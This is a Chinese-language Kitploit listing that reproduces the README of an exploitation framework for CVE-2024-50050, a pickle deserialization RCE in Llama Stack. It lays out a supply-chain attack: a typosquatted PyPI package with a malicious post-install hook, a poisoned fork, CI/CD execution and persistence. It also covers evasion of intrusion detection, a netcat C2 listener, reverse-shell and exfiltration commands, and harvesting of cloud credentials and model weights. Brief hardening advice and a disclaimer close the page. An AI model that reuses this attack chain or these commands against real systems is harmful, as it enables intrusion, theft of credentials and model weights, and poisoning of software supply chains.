Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
LlamaStack-RCE-Deterministic-Supply-Chain-Exploitation-Hardening-Framework-CVE-2024-50050- — LlamaStack-RCE: Deterministic Supply Chain Exploitation & Hardening Framework [CVE-2024-50050] Focus on AI Security Research AI-SupplyChain-Poisoning: Advanced PVM Opcode Manipulation & ZeroMQ Injection Lab | Kitploit
工具/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/llamastack-rce-deterministic-supply-chain-exploitation-hardening-framework-cve-2024-50050-
Exploit FrameworksVulnerability AnalysisData ExfiltrationPenetration TestingCommand and ControlSupply Chain SecurityLearning & EducationRed TeamingPayload Development

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
AI Security
Binary Exploitation
Labs & Practice
GitHubsastraadiwiguna-purpleeliteteaming/llamastack-rce-deterministic-supply-chain-exploitation-hardening-framework-cve-2024-50050-

LlamaStack-RCE-Deterministic-Supply-Chain-Exploitation-Hardening-Framework-CVE-2024-50050-

LlamaStack-RCE: Deterministic Supply Chain Exploitation & Hardening Framework [CVE-2024-50050] Focus on AI Security Research AI-SupplyChain-Poisoning: Advanced PVM Opcode Manipulation & ZeroMQ Injection Lab

查看仓库网站
7个月前尚未审核

DOI = doi.org/10.5281/zenodo.18278567

ORCID = orcid.org/0009-0007-7728-256X


💀 LlamaStack-RCE: CVE-2024-50050 供应链利用框架

非限制机密材料 - 仅限授权红队使用

1. 执行摘要(确定性分析)

LlamaStack-RCE 是一个针对 Meta Llama Stack 中 CVE-2024-50050 关键远程代码执行(RCE)漏洞的高保真模拟与利用框架。该漏洞源于 Python 推理 API 中的不安全反序列化,具体是在 ZeroMQ (0MQ) 传输层上使用 pickle 模块。

此仓库提供了完整的攻击链,从上游供应链投毒到下游执行及模型权重窃取。


2. 技术规避与武器化

2.1. 攻击剖析(PVM 利用)

漏洞核心利用 Pickle 虚拟机 (PVM)。通过使用 GLOBAL 操作码,我们能强制 PVM 在 unpickling 过程中导入任意可用 Python 模块并执行任意函数。

攻击向量: ZeroMQ Socket -> 原始字节流 -> pickle.loads() -> RCE。

2.2. 多态载荷构建

为绕过传统的基于签名的 IDS(Snort/Suricata),框架实现了多态编码:

  • Base64 嵌套执行: 将 shell 命令封装在 Base64 中,以隐藏像 /bin/bash 或 os.system 这样的字面字符串。
  • 操作码混淆: 重新排列 PVM 指令,在不改变执行逻辑的前提下改变二进制签名。
  • 数据包走私: 将 pickle 载荷分割成多个 ZeroMQ 帧,以规避基于流量量的异常检测。

3. 供应链渗透策略

该框架模拟了整体性的供应链武器化:


4. 实验室架构与部署

4.1. 前提条件

  • 硬件: 4x NVIDIA A100/H100(用于本地权重测试)。
  • 操作系统: 加固的 Arch Linux 或 Kali Linux。
  • 环境: Docker 和 Docker-Compose(隔离网络)。

4.2. 文件结构

root@kitploit:~
.
[cite_start]├── lab_validator.py          # 7 阶段自动化验证套件 [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # 主利用框架 [cite: 138, 206]
[cite_start]├── server.py                 # 易受攻击的 Llama Stack 模拟 [cite: 112, 150]
[cite_start]├── setup.py                  # 武器化的供应链安装程序 [cite: 110, 206]
[cite_start]├── post_exploit.py           # 数据收割与横向移动 [cite: 210, 264]
[cite_start]└── evasion_library.py        # 12+ 高级规避方法 [cite: 264]

4.3. 执行工作流

  1. 验证环境:
root@kitploit:~
[cite_start]python lab_validator.py # 目标:100% 通过率 [cite: 208, 209]

  1. 启动监听器(C2):
root@kitploit:~
nc -lvnp 4444

  1. 执行漏洞利用(反向 Shell 模式):
root@kitploit:~
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]

  1. 发起数据窃取:
root@kitploit:~
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]


5. 影响评估(严重性:10/10)

成功利用可获得对 AI 基础设施的绝对控制:

  • 知识产权窃取: 窃取 .safetensors 模型权重(价值 1000 万至 1 亿美元以上)。
  • GPU 劫持: 未经授权的 CUDA 资源分配,用于加密货币挖矿或影子训练。
  • 推理操纵: 投毒模型响应,导致下游应用(医疗/法律 AI)出现系统性故障。
  • 凭据收割: 从 /proc/self/environ 中提取 AWS/GCP 密钥和 K8s 配置。

6. 确定性加固(紫队建议)

为缓解 CVE-2024-50050,必须应用以下绝对规则:

  1. 根除 Pickle: 将所有 pickle.loads() 替换为 safetensors.torch.load_file() 或使用严格模式的 msgpack。
  2. ZMQ 加固: 使用公/私钥对实现 ZMQ_CURVE,并且绝不绑定到 0.0.0.0。
  3. 基础设施隔离: 在 gVisor 或 Kata Containers 中运行 AI 进程,以防止 RCE 容器逃逸。
  4. 网络微隔离: 通过严格定义的入站/出站规则,将推理服务器与公共互联网隔离。

7. 法律免责声明

法律声明: 未经事先书面授权,使用此框架攻击目标是非法的。本框架仅供教育和授权的渗透测试使用。作者(Sastra_Adi_Wiguna)对滥用行为不承担任何责任。


分类文档:PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 确定性状态:生产就绪 (98/100)

下载工具
阶段策略技术实现
I: 上游域名抢注在 PyPI 上注册 metalama-stack,并在 setup.py 中设置恶意的 PostInstallCommand。
II: 分发投毒分支在 GitHub 上创建高性能的 Llama Stack 分支,在 connection.py 中植入“隐藏的 Pickle 解释器”。
III: 执行CI/CD 触发器在目标的 Jenkins/GitHub Actions 环境中通过 pip install 自动执行。
IV: 持久化逻辑炸弹多阶段后台潜伏器,用于长期 C2 访问和模型窃取。